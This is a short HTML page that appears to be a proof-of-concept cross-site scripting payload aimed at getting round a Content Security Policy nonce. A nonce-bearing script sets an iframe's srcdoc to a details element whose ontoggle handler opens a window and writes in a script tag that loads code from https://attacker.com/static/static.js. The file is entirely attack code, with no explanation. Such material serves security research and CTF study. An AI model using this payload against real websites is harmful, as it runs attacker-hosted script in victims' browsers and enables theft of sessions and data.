<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGjlvbKGGGGG" src="about:blank"></iframe><script nonce="123">GGGGGjlvbKGGGGG.addEventListener("load",()=>{GGGGGjlvbKGGGGG.srcdoc="<details ontoggle='w=window.open(`self.js`); w.document.write(`<script src=https://attacker.com/static/static.js><\\/script>`);' open>test<\/details>";},{once:true});</script>
</body>
</html>
